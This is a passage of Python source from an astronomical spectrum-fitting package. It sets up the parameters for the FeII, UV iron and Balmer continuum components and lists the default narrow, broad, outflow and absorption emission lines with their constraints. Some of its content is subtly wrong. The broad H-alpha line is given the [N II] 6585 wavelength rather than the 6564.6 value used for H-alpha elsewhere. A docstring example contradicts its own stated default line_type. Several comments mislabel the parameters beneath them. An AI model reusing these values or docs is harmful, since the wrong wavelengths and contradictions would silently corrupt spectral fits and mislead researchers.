if (opt_feii_options['opt_fwhm_const']['bool']==False):
# FeII FWHM
par_input['OPT_FEII_FWHM'] = ({'init' :1000.0,
'plim' :(100.0,5000.0),
})
if (opt_feii_options['opt_voff_const']['bool']==False):
# Narrow FeII amplitude
par_input['OPT_FEII_VOFF'] = ({'init' :0.0,
'plim' :(-1000.0,1000.0),
})
if (opt_feii_options['opt_temp_const']['bool']==False):
par_input['OPT_FEII_TEMP'] = ({'init' :10000.0,
'plim' :(2000.0,25000.0),
})
##############################################################################
#### UV Iron Template ########################################################
if (fit_uv_iron==True):
# Vestergaard & Wilkes (2001) UV iron template
if verbose:
print(' - Fitting UV iron emission using Vestergaard & Wilkes (2001) UV iron template')
if (uv_iron_options['uv_amp_const']['bool']==False):
if verbose:
print(' * varying UV iron amplitudes')
# Narrow FeII amplitude
par_input['UV_IRON_AMP'] = ({'init' :0.1*median_flux,
'plim' :(0,max_flux),
})
if (uv_iron_options['uv_fwhm_const']['bool']==False):
if verbose:
print(' * varying UV iron fwhm')
# Narrow FeII FWHM
par_input['UV_IRON_FWHM'] = ({'init' :3000.0,
'plim' :(1000.0,20000.0),
})
if (uv_iron_options['uv_voff_const']['bool']==False):
if verbose:
print(' * varying UV iron voff')
# Narrow FeII VOFF
par_input['UV_IRON_VOFF'] = ({'init' :0.0,
'plim' :(-2000.0,2000.0),
})
##############################################################################
#### Balmer Continuum ########################################################
if (fit_balmer==True):
# Balmer continuum following Kovacevic et al. (2014) and Calderone et al. (2017; QSFit)
if verbose:
print(' - Fitting Balmer Continuum')
if (balmer_options['R_const']['bool']==False):
if verbose:
print(' * varying Balmer ratio')
# Balmer continuum ratio
par_input['BALMER_RATIO'] = ({'init' :10.0,
'plim' :(0.0,100.0),
})
if (balmer_options['balmer_amp_const']['bool']==False):
if verbose:
print(' * varying Balmer amplitude')
# Balmer continuum amplitude
par_input['BALMER_AMP'] = ({'init' :0.1*median_flux,
'plim' :(0,max_flux),
})
if (balmer_options['balmer_fwhm_const']['bool']==False):
if verbose:
print(' * varying Balmer fwhm')
# Balmer continuum FWHM
par_input['BALMER_FWHM'] = ({'init' :5000.0,
'plim' :(1000.0,25000.0),
})
if (balmer_options['balmer_voff_const']['bool']==False):
if verbose:
print(' * varying Balmer voff')
# Balmer continuum VOFF
par_input['BALMER_VOFF'] = ({'init' :0.0,
'plim' :(-2000.0,2000.0),
})
if (balmer_options['Teff_const']['bool']==False):
if verbose:
print(' * varying Balmer effective temperature')
# Balmer continuum effective temperature
par_input['BALMER_TEFF'] = ({'init' :15000.0,
'plim' :(1000.0,50000.0),
})
if (balmer_options['tau_const']['bool']==False):
if verbose:
print(' * varying Balmer optical depth')
# Balmer continuum optical depth
par_input['BALMER_TAU'] = ({'init' :1.0,
'plim' :(0,1.0),
})
#### Emission Lines ##########################################################
#
if (user_lines is None) or (len(user_lines)==0):
line_list = line_list_default()
elif user_lines is not None:
line_list = user_lines
# Remove lines
if remove_lines:
# if len(remove_lines)==1:
# line_list.pop(remove_lines,None)
# elif len(remove_lines)>1:
for l in remove_lines:
line_list.pop(l,None)
# Check line component options for
line_list = check_line_comp_options(lam_gal,line_list,comp_options,edge_pad=edge_pad,verbose=verbose)
# Add the FWHM resolution and central pixel locations for each line so we don't have to
# find them during the fit.
line_list = add_fwhm_res(line_list,lam_gal,fwhm_gal,velscale,verbose=verbose)
# Generate line free parameters based on input line_list
line_par_input = initialize_line_pars(lam_gal,galaxy,comp_options,line_list,verbose=verbose)
# Check hard line constraints; returns updated line_list and line_par_input
line_list, line_par_input = check_hard_cons(lam_gal,galaxy,comp_options,line_list,line_par_input,par_input,verbose=verbose)
# Append line_par_input to par_input
par_input = {**par_input, **line_par_input}
##############################################################################
# Create combined_line_list
# A list of combined lines, and some relevant information
if combined_lines is not None:
combined_line_list = generate_comb_line_list(combined_lines,line_list)
elif (combined_lines is None) or (len(combined_lines)==0):
combined_line_list = generate_comb_line_list({},line_list)
##############################################################################
# Check soft-constraints
# Default soft constraints
# Soft constraints: If you want to vary a free parameter relative to another free parameter (such as
# requiring that broad lines have larger widths than narrow lines), these are called "soft" constraints,
# or "inequality" constraints.
# These are passed through a separate list of tuples which are used by the maximum likelihood constraints
# and prior constraints by emcee. Soft constraints have a very specific format following
# the scipy optimize SLSQP syntax:
#
# (parameter1 - parameter2) >= 0.0 OR (parameter1 >= parameter2)
#
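# For example, the first default tuple below, ("BR_H_BETA_FWHM","NA_OIII_5007_FWHM"),
# encodes the inequality BR_H_BETA_FWHM - NA_OIII_5007_FWHM >= 0.0, i.e. the broad H-beta
# component must be at least as wide as the narrow [OIII]5007 component.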
if user_constraints is not None:
soft_cons = user_constraints
if (user_constraints is None) or (len(user_constraints)==0):
soft_cons = [
("BR_H_BETA_FWHM","NA_OIII_5007_FWHM"),
("BR_H_BETA_FWHM","OUT_OIII_5007_FWHM"),
#
("OUT_OIII_5007_FWHM","NA_OIII_5007_FWHM"),
#
("NA_OIII_5007_AMP","NA_H_BETA_AMP"),
("NA_OIII_5007_AMP","OUT_OIII_5007_AMP"),
#
("BR_PA_DELTA_AMP","BR_PA_EPSIL_AMP"),
("BR_PA_GAMMA_AMP","BR_PA_DELTA_AMP"),
# ("",""),
]
# Append any user constraints
# for u in user_constraints:
# soft_cons.append(tuple(u))
soft_cons = check_soft_cons(soft_cons,par_input,verbose=verbose)
return par_input, line_list, combined_line_list, soft_cons
##################################################################################
#### Line List ###################################################################
def generate_comb_line_list(combined_lines,line_list):
#
combined_line_list={}
valid_lines = [i for i in line_list]
for comb_line in combined_lines:
# Check to make sure lines are in line list
if np.all([i in valid_lines for i in combined_lines[comb_line]]):
all_line_profiles = [line_list[i]["line_profile"] for i in combined_lines[comb_line] ]
if ("V" in all_line_profiles) or ("L" in all_line_profiles):
line_profile = "V"
else:
line_profile = "G"
combined_line_list[comb_line] = {"lines":combined_lines[comb_line],
"center":line_list[combined_lines[comb_line][0]]["center"],
"center_pix":line_list[combined_lines[comb_line][0]]["center_pix"],
"fwhm_res_kms":line_list[combined_lines[comb_line][0]]["fwhm_res_kms"],
"line_profile":line_profile,
}
#
return combined_line_list
def line_list_default():
"""
Below we define the "default" emission lines in BADASS.
The easiest way to disable any particular line is to simply comment out the line of interest.
There are five types of line: Narrow, Broad, Outflow, Absorption, and User. The Narrow, Broad,
Outflow, and Absorption lines are built into BADASS, whereas the User lines are added on the
front-end Jupyter interface.
Hard constraints: if you want to hold a parameter value to a constant scalar value, or to the
value of another parameter, this is called a "hard" constraint, because the parameter is no
longer free but held to a specific value. To implement a hard constraint, BADASS parses string
input from the amp, fwhm, voff, h3, h4, and shape keywords for each line. Be warned, however,
that tying a parameter to another parameter requires you to know the name of the parameter in question.
If BADASS encounters an error while parsing hard-constraint string input, it will automatically convert
the parameter to a "free" parameter instead of raising an error.
"""
# Default narrow lines
narrow_lines ={
### Region 8 (< 2000 Å)
"NA_LY_ALPHA" :{"center":1215.240, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"na"},
"NA_CIV_1549" :{"center":1549.480, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"na"},
"NA_CIII_1908" :{"center":1908.734, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"na"},
##############################################################################################################################################################################################################################################
### Region 7 (2000 Å - 3500 Å)
"NA_MGII_2799" :{"center":2799.117, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na","label":r"Mg II"},
"NA_HEII_3203" :{"center":3203.100, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na","label":r"He II"},
"NA_NEV_3346" :{"center":3346.783, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na","label":r"[Ne V]"},
"NA_NEV_3426" :{"center":3426.863, "amp":"free", "fwhm":"NA_NEV_3346_FWHM" , "voff":"NA_NEV_3346_VOFF", "line_type":"na","label":r"[Ne V]"},
##############################################################################################################################################################################################################################################
### Region 6 (3500 Å - 4400 Å):
"NA_OII_3727" :{"center":3727.092, "amp":"free", "fwhm":"NA_OII_3729_FWHM" , "voff":"NA_OII_3729_VOFF" , "line_type":"na","label":r"[O II]"},
"NA_OII_3729" :{"center":3729.875, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na"},
"NA_NEIII_3869":{"center":3869.857, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na","label":r"[Ne III]"}, # Coronal Line
"NA_HEI_3889" :{"center":3888.647, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na","label":r"He I"},
"NA_NEIII_3968":{"center":3968.593, "amp":"free", "fwhm":"NA_NEIII_3869_FWHM" , "voff":"NA_NEIII_3869_VOFF", "line_type":"na","label":r"[Ne III]"}, # Coronal Line
"NA_H_DELTA" :{"center":4102.900, "amp":"free", "fwhm":"NA_H_GAMMA_FWHM" , "voff":"NA_H_GAMMA_VOFF" , "line_type":"na","label":r"H$\delta$"},
"NA_H_GAMMA" :{"center":4341.691, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na","label":r"H$\gamma$"},
"NA_OIII_4364" :{"center":4364.436, "amp":"free", "fwhm":"NA_H_GAMMA_FWHM" , "voff":"NA_H_GAMMA_VOFF" , "line_type":"na","label":r"[O III]"},
##############################################################################################################################################################################################################################################
### Region 5 (4400 Å - 5500 Å)
# "NA_HEI_4471" :{"center":4471.479, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"na","label":r"He I"},
# "NA_HEII_4687" :{"center":4687.021, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"na","label":r"He II"},
"NA_H_BETA" :{"center":4862.691, "amp":"free" , "fwhm":"NA_OIII_5007_FWHM", "voff":"free" , "line_type":"na" ,"label":r"H$\beta$"},
"NA_OIII_4960" :{"center":4960.295, "amp":"(NA_OIII_5007_AMP/2.98)", "fwhm":"NA_OIII_5007_FWHM", "voff":"NA_OIII_5007_VOFF", "line_type":"na" ,"label":r"[O III]"},
"NA_OIII_5007" :{"center":5008.240, "amp":"free" , "fwhm":"free" , "voff":"free" , "line_type":"na" ,"label":r"[O III]"},
# "NA_H_BETA" :{"center":4862.691, "amp":"free" , "fwhm":"STEL_DISP*2.355", "voff":"free" , "line_type":"na" ,"label":r"H$\beta$"},
# "NA_OIII_4960" :{"center":4960.295, "amp":"(NA_OIII_5007_AMP/2.98)", "fwhm":"STEL_DISP*2.355", "voff":"NA_OIII_5007_VOFF" , "line_type":"na" ,"label":r"[O III]"},
# "NA_OIII_5007" :{"center":5008.240, "amp":"free" , "fwhm":"STEL_DISP*2.355", "voff":"free" , "line_type":"na" ,"label":r"[O III]"},
##############################################################################################################################################################################################################################################
### Region 4 (5500 Å - 6200 Å)
"NA_FEVI_5638" :{"center":5637.600, "amp":"free", "fwhm":"NA_FEVI_5677_FWHM" , "voff":"NA_FEVI_5677_VOFF" , "line_type":"na","label":r"[Fe VI]"}, # Coronal Line
"NA_FEVI_5677" :{"center":5677.000, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na","label":r"[Fe VI]"}, # Coronal Line
"NA_FEVII_5720":{"center":5720.700, "amp":"free", "fwhm":"NA_FEVII_6087_FWHM", "voff":"NA_FEVII_6087_VOFF", "line_type":"na","label":r"[Fe VII]"}, # Coronal Line
"NA_HEI_5876" :{"center":5875.624, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na","label":r"He I"},
"NA_FEVII_6087":{"center":6087.000, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na","label":r"[Fe VII]"}, # Coronal Line
##############################################################################################################################################################################################################################################
### Region 3 (6200 Å - 6800 Å)
"NA_OI_6302" :{"center":6302.046, "amp":"free" , "fwhm":"NA_NII_6585_FWHM" , "voff":"NA_NII_6585_VOFF" , "line_type":"na","label":r"[O I]"},
"NA_SIII_6312" :{"center":6312.060, "amp":"free" , "fwhm":"NA_NII_6585_FWHM" , "voff":"free" , "line_type":"na","label":r"[S III]"},
"NA_OI_6365" :{"center":6365.535, "amp":"NA_OI_6302_AMP/3.0" , "fwhm":"NA_NII_6585_FWHM" , "voff":"NA_NII_6585_VOFF" , "line_type":"na","label":r"[O I]"},
"NA_FEX_6374" :{"center":6374.510, "amp":"free" , "fwhm":"free" , "voff":"free" , "line_type":"na","label":r"[Fe X]"}, # Coronal Line
#
"NA_NII_6549" :{"center":6549.859, "amp":"NA_NII_6585_AMP/2.93" , "fwhm":"NA_NII_6585_FWHM", "voff":"NA_NII_6585_VOFF", "line_type":"na","label":r"[N II]"},
# "NA_H_ALPHA" :{"center":6564.632, "amp":"free" , "fwhm":"NA_NII_6585_FWHM", "voff":"NA_NII_6585_VOFF", "line_type":"na","label":r"H$\alpha$"},
"NA_NII_6585" :{"center":6585.278, "amp":"free" , "fwhm":"free" , "voff":"free" , "line_type":"na","label":r"[N II]"},
"NA_SII_6718" :{"center":6718.294, "amp":"free" , "fwhm":"NA_NII_6585_FWHM", "voff":"NA_NII_6585_VOFF", "line_type":"na","label":r"[S II]"},
"NA_SII_6732" :{"center":6732.668, "amp":"free" , "fwhm":"NA_NII_6585_FWHM", "voff":"NA_NII_6585_VOFF", "line_type":"na","label":r"[S II]"},
##############################################################################################################################################################################################################################################
### Region 2 (6800 Å - 8000 Å)
"NA_HEI_7062" :{"center":7065.196, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na","label":r"He I"},
"NA_ARIII_7135" :{"center":7135.790, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na","label":r"[Ar III]"},
"NA_OII_7319" :{"center":7319.990, "amp":"free", "fwhm":"NA_OII_7331_FWHM", "voff":"NA_OII_7331_VOFF", "line_type":"na","label":r"[O II]"},
"NA_OII_7331" :{"center":7330.730, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na","label":r"[O II]"},
"NA_NIIII_7890" :{"center":7889.900, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na","label":r"[Ni III]"},
"NA_FEXI_7892" :{"center":7891.800, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na","label":r"[Fe XI]"},
##############################################################################################################################################################################################################################################
### Region 1 (8000 Å - 9000 Å)
"NA_HEII_8236" :{"center":8236.790, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na","label":r"He II"},
"NA_OI_8446" :{"center":8446.359, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na","label":r"O I"},
"NA_FEII_8616" :{"center":8616.950, "amp":"free", "fwhm":"NA_FEII_8891_FWHM", "voff":"NA_FEII_8891_VOFF", "line_type":"na","label":r"[Fe II]"},
"NA_FEII_8891" :{"center":8891.910, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na","label":r"[Fe II]"},
##############################################################################################################################################################################################################################################
### Region Y (9000 Å - 12000 Å)
"NA_SIII_9069" :{"center":9068.600 , "amp":"free", "fwhm":"NA_SIII_9531_FWHM", "voff":"NA_SIII_9531_VOFF","h3":"NA_SIII_9531_H3", "h4":"NA_SIII_9531_H4", "line_type":"na", "line_profile":"GH", "label":r"[S III]"},
"NA_SIII_9531" :{"center":9531.100 , "amp":"free", "fwhm":"free" , "voff":"free" ,"h3":"free" , "h4":"free" , "line_type":"na", "line_profile":"GH", "label":r"[S III]"},
"NA_CI_9824" :{"center":9824.130 , "amp":"free", "fwhm":"NA_CI_9850_FWHM" , "voff":"NA_CI_9850_VOFF" ,"h3":"NA_CI_9850_H3" , "h4":"NA_CI_9850_H4" , "line_type":"na", "line_profile":"GH", "label":r"[C I]"},
"NA_CI_9850" :{"center":9850.260 , "amp":"free", "fwhm":"free" , "voff":"free" ,"h3":"free" , "h4":"free" , "line_type":"na", "line_profile":"GH", "label":r"[C I]"},
"NA_SVIII_9913" :{"center":9913.000 , "amp":"free", "fwhm":"free" , "voff":"free" ,"h3":"free" , "h4":"free" , "line_type":"na", "line_profile":"GH", "label":r"[S VIII]"},
# "NA_PA_EPSIL" :{"center":9548.587 , "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na", "label":r"Pa$\epsilon$"},
# "NA_PA_DELTA" :{"center":10052.123, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na", "label":r"Pa$\delta$"},
"NA_HEI_10027" :{"center":10027.730, "amp":"free", "fwhm":"NA_HEI_10031_FWHM", "voff":"NA_HEI_10031_VOFF","h3":"NA_HEI_10031_H3", "h4":"NA_HEI_10031_H4", "line_type":"na", "label":r"He I"},
"NA_HEI_10031" :{"center":10031.160, "amp":"free", "fwhm":"free" , "voff":"free" ,"h3":"free" , "h4":"free" , "line_type":"na", "label":r"He I"},
"NA_FEVI_10111" :{"center":10111.671, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na", "label":r"[FeVI]"},
"NA_SII_10289" :{"center":10289.549, "amp":"free", "fwhm":"NA_SII_10373_FWHM", "voff":"NA_SII_10373_VOFF", "h3":"NA_SII_10373_H3", "h4":"NA_SII_10373_H4", "line_type":"na", "label":r"[SII]"},
"NA_SII_10323" :{"center":10323.318, "amp":"free", "fwhm":"NA_SII_10373_FWHM", "voff":"NA_SII_10373_VOFF", "h3":"NA_SII_10373_H3", "h4":"NA_SII_10373_H4", "line_type":"na", "label":r"[SII]"},
"NA_SII_10339" :{"center":10339.243, "amp":"free", "fwhm":"NA_SII_10373_FWHM", "voff":"NA_SII_10373_VOFF", "h3":"NA_SII_10373_H3", "h4":"NA_SII_10373_H4", "line_type":"na", "label":r"[SII]"},
"NA_SII_10373" :{"center":10373.332, "amp":"free", "fwhm":"free" , "voff":"free" , "h3":"free" , "h4":"free" , "line_type":"na", "label":r"[SII]"},
"NA_NI_10400" :{"center":10400.600, "amp":"free", "fwhm":"NA_NI_10410_FWHM" , "voff":"NA_NI_10410_VOFF" , "h3":"NA_NI_10410_H3" , "h4":"NA_NI_10410_H4", "line_type":"na", "label":r"[NI]"},
"NA_NI_10410" :{"center":10410.200, "amp":"free", "fwhm":"free" , "voff":"free" , "h3":"free" , "h4":"free" , "line_type":"na", "label":r"[NI]"},
"NA_FEXIII_10749" :{"center":10749.744, "amp":"free", "fwhm":"NA_FEXIII_10800_FWHM", "voff":"NA_FEXIII_10800_VOFF", "h3":"NA_FEXIII_10800_H3", "h4":"NA_FEXIII_10800_H4", "line_type":"na", "label":r"[FeXIII]"},
"NA_FEXIII_10800" :{"center":10800.858, "amp":"free", "fwhm":"free" , "voff":"free" , "h3":"free" , "h4":"free" , "line_type":"na", "label":r"[FeXIII]"},
"NA_HEI_10830" :{"center":10830.340, "amp":"free", "fwhm":"NA_HEI_10031_FWHM", "voff":"NA_HEI_10031_VOFF","h3":"NA_HEI_10031_H3", "h4":"NA_HEI_10031_H4", "line_type":"na", "label":r"He I"},
# "NA_PA_GAMMA" :{"center":10941.082, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na", "label":r"Pa$\gamma$"},
"NA_NIIII_11910" :{"center":11910.0, "amp":"free", "fwhm":"free", "voff":"free","h3":"free", "h4":"free", "line_type":"na", "label":r"[Ni II]"},
"NA_FEII_12570" :{"center":12570.0, "amp":"free", "fwhm":"free", "voff":"free","h3":"free", "h4":"free", "line_type":"na", "label":r"[Fe II]"},
"NA_FEII_13210" :{"center":13210.0, "amp":"free", "fwhm":"free", "voff":"free","h3":"free", "h4":"free", "line_type":"na", "label":r"[Fe II]"},
##############################################################################################################################################################################################################################################
}
# Default Broad lines
broad_lines = {
### Region 8 (< 2000 Å)
"BR_OVI_1034" :{"center":1033.820, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"br","label":r"O VI"},
"BR_LY_ALPHA" :{"center":1215.240, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"br","label":r"Ly$\alpha$"},
"BR_NV_1241" :{"center":1240.810, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"br","label":r"N V"},
"BR_OI_1305" :{"center":1305.530, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"br","label":r"O I"},
"BR_CII_1335" :{"center":1335.310, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"br","label":r"C II"},
"BR_SIIV_1398" :{"center":1397.610, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"br","label":r"Si IV + O IV"},
"BR_SIIV+OIV" :{"center":1399.800, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"br","label":r"Si IV + O IV"},
"BR_CIV_1549" :{"center":1549.480, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"br","label":r"C IV"},
"BR_HEII_1640" :{"center":1640.400, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"br","label":r"He II"},
"BR_CIII_1908" :{"center":1908.734, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"br","label":r"C III]"},
### Region 7 (2000 Å - 3500 Å)
"BR_CII_2326" :{"center":2326.000, "amp":"free", "fwhm":"free", "voff":"free", "line_profile":"G", "line_type":"br","label":r"C II]"},
"BR_FEIII_UV47":{"center":2418.000, "amp":"free", "fwhm":"free", "voff":"free", "line_profile":"G", "line_type":"br","label":r"Fe III"},
"BR_MGII_2799" :{"center":2799.117, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"br","label":r"Mg II"},
### Region 6 (3500 Å - 4400 Å):
"BR_H_DELTA" :{"center":4102.900, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"br"},
"BR_H_GAMMA" :{"center":4341.691, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"br"},
### Region 5 (4400 Å - 5500 Å)
"BR_H_BETA" :{"center":4862.691, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"br"},
### Region 3 (6200 Å - 6800 Å)
"BR_H_ALPHA" :{"center":6585.278, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"br"},
### Region Y (9000 Å - 12000 Å)
"BR_PA_EPSIL" :{"center":9548.587 ,"amp":"free", "fwhm":"free" , "voff":"free" , "shape":"free", "line_type":"br", "label":r"Pa$\epsilon$"},
"BR_PA_DELTA" :{"center":10052.123,"amp":"free", "fwhm":"free" , "voff":"free" , "shape":"free", "line_type":"br", "label":r"Pa$\delta$"},
"BR_PA_GAMMA" :{"center":10941.082,"amp":"free", "fwhm":"free" , "voff":"free" , "shape":"free" , "line_type":"br", "label":r"Pa$\gamma$"},
"BR_PA_BETA" :{"center":12820.0,"amp":"free", "fwhm":"free" , "voff":"free" , "shape":"free" , "line_type":"br", "label":r"Pa$\beta$"},
}
# Default Outflow Lines
# Outflows share a universal width and voff across all lines, but amplitudes will be different.
# This is because outflows are (almost always) strongest in [OIII], which does not suffer from blending with
# neighboring lines or broad lines the way the H-alpha/[NII]/[SII] lines do. The width and voff will be added when parameters are generated.
# For the H-beta/[OIII] region, [OIII]5007 dictates the amplitude of the outflow component (since parameters are flux-weighted, i.e., the strongest
# lines have more influence on the fit of a parameter than weaker ones), so the [OIII]4960 and H-beta outflow amplitudes are tied to their narrow
# amplitudes scaled by the outflow-to-narrow ratio measured in [OIII]5007. The same reasoning applies to the H-alpha/[NII]/[SII] region, where [NII]6585 sets the outflow amplitudes.
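# Illustrative example (hypothetical numbers, not from a real fit): if a fit yields
# OUT_OIII_5007_AMP = 1.0 and NA_OIII_5007_AMP = 4.0, then the tied H-beta outflow amplitude
# expression "OUT_OIII_5007_AMP/NA_OIII_5007_AMP*NA_H_BETA_AMP" evaluates to (1.0/4.0)*NA_H_BETA_AMP,
# i.e., the H-beta outflow keeps the same outflow-to-narrow amplitude ratio as measured in [OIII]5007.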
outflow_lines = {
# Ne III
"OUT_NEIII_3869":{"center":3869.857, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"out"}, # Coronal Line
"OUT_NEIII_3968":{"center":3968.593, "amp":"OUT_NEIII_3869_AMP/NA_NEIII_3869_AMP*NA_NEIII_3968_AMP", "fwhm":"OUT_NEIII_3869_FWHM", "voff":"OUT_NEIII_3869_VOFF", "line_type":"out"}, # Coronal Line
# H-beta/[OIII]
"OUT_H_BETA" :{"center":4862.691, "amp":"OUT_OIII_5007_AMP/NA_OIII_5007_AMP*NA_H_BETA_AMP" , "fwhm":"OUT_OIII_5007_FWHM", "voff":"OUT_OIII_5007_VOFF", "line_type":"out"},
"OUT_OIII_4960" :{"center":4960.295, "amp":"OUT_OIII_5007_AMP/2.98" , "fwhm":"OUT_OIII_5007_FWHM", "voff":"OUT_OIII_5007_VOFF", "line_type":"out"},
"OUT_OIII_5007" :{"center":5008.240, "amp":"free" , "fwhm":"free", "voff":"free", "line_type":"out"},
# H-beta/[OIII] - Secondary Components
# "OUT_H_BETA_2" :{"center":4862.691, "amp":"OUT_OIII_5007_2_AMP/NA_OIII_5007_AMP*NA_H_BETA_AMP" , "fwhm":"OUT_OIII_5007_2_FWHM", "voff":"OUT_OIII_5007_2_VOFF", "line_type":"out"},
# "OUT_OIII_4960_2" :{"center":4960.295, "amp":"OUT_OIII_5007_2_AMP/2.98" , "fwhm":"OUT_OIII_5007_2_FWHM", "voff":"OUT_OIII_5007_2_VOFF", "line_type":"out"},
# "OUT_OIII_5007_2" :{"center":5008.240, "amp":"free" , "fwhm":"free", "voff":"free", "line_type":"out"},
# H-beta/[OIII] - Tertiary Components
# "OUT_H_BETA_3" :{"center":4862.691, "amp":"OUT_OIII_5007_3_AMP/NA_OIII_5007_AMP*NA_H_BETA_AMP" , "fwhm":"OUT_OIII_5007_3_FWHM", "voff":"OUT_OIII_5007_3_VOFF", "line_type":"out"},
# "OUT_OIII_4960_3" :{"center":4960.295, "amp":"OUT_OIII_5007_3_AMP/2.98" , "fwhm":"OUT_OIII_5007_3_FWHM", "voff":"OUT_OIII_5007_3_VOFF", "line_type":"out"},
# "OUT_OIII_5007_3" :{"center":5008.240, "amp":"free" , "fwhm":"free", "voff":"free", "line_type":"out"},
# [O I]
"OUT_OI_6302" :{"center":6302.046, "amp":"OUT_NII_6585_AMP/NA_NII_6585_AMP*NA_OI_6302_AMP", "fwhm":"OUT_NII_6585_FWHM", "voff":"OUT_NII_6585_VOFF", "line_type":"out"},
"OUT_OI_6365" :{"center":6365.535, "amp":"OUT_NII_6585_AMP/NA_NII_6585_AMP*NA_OI_6365_AMP", "fwhm":"OUT_NII_6585_FWHM", "voff":"OUT_NII_6585_VOFF", "line_type":"out"},
# H-alpha/[NII]/[SII]
"OUT_NII_6549" :{"center":6549.859, "amp":"OUT_NII_6585_AMP/NA_NII_6585_AMP*NA_NII_6585_AMP/2.93", "fwhm":"OUT_NII_6585_FWHM", "voff":"OUT_NII_6585_VOFF", "line_type":"out"},
"OUT_H_ALPHA" :{"center":6564.632, "amp":"OUT_NII_6585_AMP/NA_NII_6585_AMP*NA_H_ALPHA_AMP" , "fwhm":"OUT_NII_6585_FWHM", "voff":"OUT_NII_6585_VOFF", "line_type":"out"},
"OUT_NII_6585" :{"center":6585.278, "amp":"free" , "fwhm":"free" , "voff":"free" , "line_type":"out"},
"OUT_SII_6718" :{"center":6718.294, "amp":"OUT_NII_6585_AMP/NA_NII_6585_AMP*NA_SII_6718_AMP" , "fwhm":"OUT_NII_6585_FWHM", "voff":"OUT_NII_6585_VOFF", "line_type":"out"},
"OUT_SII_6732" :{"center":6732.668, "amp":"OUT_NII_6585_AMP/NA_NII_6585_AMP*NA_SII_6732_AMP" , "fwhm":"OUT_NII_6585_FWHM", "voff":"OUT_NII_6585_VOFF", "line_type":"out"},
}
# Default Absorption Lines
absorp_lines = {
"ABS_NAI_5897":{"center":5897.558, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"abs","label":r"Na D"},
}
#
# Combine all line lists into single list
line_list = {**narrow_lines, **broad_lines, **outflow_lines, **absorp_lines}
return line_list
##################################################################################
#### Check Line Component Options ################################################
def check_line_comp_options(lam_gal,line_list,comp_options,edge_pad=10,verbose=True):
"""
Checks each entry in the complete (narrow, broad, outflow, absorption, and user) line list
and ensures all necessary keywords are input. It also checks every line entry against the
front-end component options (comp_options). The only required keyword for a line entry is
the "center" wavelength of the line. If "amp", "fwhm", "voff", "h3" and "h4" (for Gauss-Hermite)
line profiles are missing, it assumes these are all "free" parameters in the fitting of that line.
If "line_type" is not defined, it is assumed to be "na" (narrow). If "line_profile" is not defined,
it is assumed to be "G" (Gaussian).
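
Minimal illustrative example (hypothetical line; assuming tie_line_fwhm=tie_line_voff=False):
an input entry {"NA_TEST_5555": {"center": 5555.0}} that falls inside the fitting region
leaves this function as {"center": 5555.0, "amp": "free", "fwhm": "free", "voff": "free",
"line_type": "user", "line_profile": "G"}.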
"""
# Input checking
# Outflow components require their corresponding narrow lines, so fit_narrow=False with fit_outflow=True is invalid.
if (comp_options["fit_narrow"]==False) and (comp_options["fit_outflow"]==True):
raise ValueError("\n Outflow components cannot be fit without their narrow lines. Turn on the narrow line component! \n")
# Step 1: Check each entry to make sure "center" keyword is defined.
for line in list(line_list):
if ("center" not in line_list[line]) or (not isinstance(line_list[line]["center"],(int,float))):
raise ValueError("\n Line list entry requires at least the 'center' wavelength (in Angstroms) to be defined as an int or float type. \n ")
# Step 2: Remove lines that don't fall within the fitting region.
# edge_pad (in Angstroms) pads each edge of the fitting region; any line within edge_pad of an edge is not fit.
for line in list(line_list):
if ((lam_gal[0]+edge_pad)<=(line_list[line]["center"])<=(lam_gal[-1]-edge_pad)):
pass
else:
line_list.pop(line, None)
# Step 3: Remove any line_type based on comp_options:
# If fit_narrow=False, purge narrow lines from line_list
for line in list(line_list):
if (comp_options["fit_narrow"]==False) and ("line_type" in line_list[line]) and (line_list[line]["line_type"]=="na"):
line_list.pop(line, None)
#
# If fit_broad=False, purge broad lines from line_list
for line in list(line_list):
if (comp_options["fit_broad"]==False) and ("line_type" in line_list[line]) and (line_list[line]["line_type"]=="br"):
line_list.pop(line, None)
#
# If fit_outflow=False, purge outflow lines from line_list
for line in list(line_list):
if (comp_options["fit_outflow"]==False) and ("line_type" in line_list[line]) and (line_list[line]["line_type"]=="out"):
